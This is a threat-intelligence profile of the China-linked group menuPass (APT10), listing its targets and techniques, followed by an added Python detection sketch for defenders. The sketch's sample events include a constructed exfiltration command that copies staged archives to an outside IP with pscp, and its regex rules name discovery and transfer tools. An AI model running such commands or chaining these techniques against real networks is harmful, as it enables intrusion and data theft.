Group: menuPass, Stone Panda, ...

ID: G0045
Aliases: menuPass, Stone Panda, APT10, Red Apollo, CVNX

menuPass is a threat group that appears to originate from China and has been active since approximately 2009. The group has targeted healthcare, defense, aerospace, and government sectors, and has targeted Japanese victims since at least 2014. In 2016 and 2017, the group targeted managed IT service providers, manufacturing and mining companies, and a university.[1][2][3][4][5]

Alias Descriptions

  • Red Apollo - [4]
  • CVNX - [4]

Techniques Used

  • PowerShell - menuPass uses PowerSploit to inject shellcode into PowerShell.[6]
  • Credential Dumping - menuPass has used a modified version of pentesting tools wmiexec.vbs and to dump credentials.[6][7]
  • Command-Line Interface - menuPass executes commands using a command-line interface and reverse shell. The group has used a modified version of pentesting script wmiexec.vbs to execute commands.[4][6][7]
  • Remote System Discovery - menuPass uses scripts to enumerate IP ranges on the victim network.[6] menuPass has also issued the command net view /domain to a PlugX implant to gather information about remote systems on the network.[5]
  • DLL Side-Loading - menuPass has used DLL side-loading to launch versions of Mimikatz and PwDump6.[6]
  • Account Discovery - menuPass has used the Microsoft administration tool csvde.exe to export Active Directory data.[6]
  • Data Compressed - menuPass has compressed files before exfiltration using TAR and RAR.[4][6]
  • Scheduled Task - menuPass has used a script ( to execute a command on a target machine via Task Scheduler.[6]
  • Valid Accounts - menuPass has used valid accounts shared between Managed Service Providers and clients to move between the two environments.[4]
  • Data Staged - menuPass stages data prior to exfiltration in multi-part archives, often saved in the Recycle Bin.[4]
  • Data from Network Shared Drive - menuPass has collected data from remote systems by mounting network shares with net use and using Robocopy to transfer data.[4]
  • Remote Services - menuPass has used Putty Secure Copy Client (PSCP) to transfer data.[4]
  • Connection Proxy - menuPass has used a global service provider's IP as a proxy for C2 traffic from a victim.[5]
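
Detection sketch (an added example, not part of the original group page): most of the tools named in the list above are noisy on their own, so this Python snippet tags process command lines by technique and reports only hosts where several distinct techniques co-occur. The host names, paths, addresses, sample events and the threshold of 3 are constructed assumptions.

```python
import re
from collections import defaultdict

# Patterns built only from tools and commands named in the technique list.
RULES = [
    ("Remote System Discovery",
     re.compile(r"\bnet1?(\.exe)?\s+view\s+/domain\b", re.I)),
    ("Account Discovery", re.compile(r"\bcsvde(\.exe)?\b", re.I)),
    ("Command-Line Interface", re.compile(r"\bwmiexec\.vbs\b", re.I)),
    ("Data from Network Shared Drive",
     re.compile(r"\bnet1?(\.exe)?\s+use\b|\brobocopy(\.exe)?\b", re.I)),
    ("Remote Services", re.compile(r"\bpscp(\.exe)?\b", re.I)),
    # Archiver invoked with a path inside the Recycle Bin.
    ("Data Staged",
     re.compile(r"\b(rar|tar)(\.exe)?\b.*\$recycle\.bin", re.I)),
]

def classify(cmdline):
    """Return the technique labels whose pattern matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def hosts_of_interest(events, threshold=3):
    """Group (host, cmdline) events and keep hosts showing at least
    `threshold` distinct techniques (threshold is an assumed tuning value)."""
    seen = defaultdict(set)
    for host, cmdline in events:
        seen[host].update(classify(cmdline))
    return {h: sorted(t) for h, t in seen.items() if len(t) >= threshold}

# Constructed sample process-creation events: (host, command line).
EVENTS = [
    ("ws-014", r"net view /domain"),
    ("ws-014", r"csvde.exe -f C:\Users\Public\ad.csv"),
    ("ws-014", r"net use Z: \\fs01.example\projects"),
    ("ws-014", r"robocopy Z:\ C:\$Recycle.Bin\s1 /E"),
    ("ws-014", r"rar.exe a -v100m C:\$Recycle.Bin\s1\a.rar C:\$Recycle.Bin\s1"),
    ("ws-014", r"pscp.exe C:\$Recycle.Bin\s1\a.part1.rar user@192.0.2.10:/tmp/"),
    # Ordinary admin activity: one technique only, stays below the threshold.
    ("ws-022", r"net use H: \\fs01.example\home"),
    ("ws-022", r"robocopy H:\docs D:\backup /E"),
]

if __name__ == "__main__":
    for host, techniques in hosts_of_interest(EVENTS).items():
        print(host, "->", ", ".join(techniques))
```
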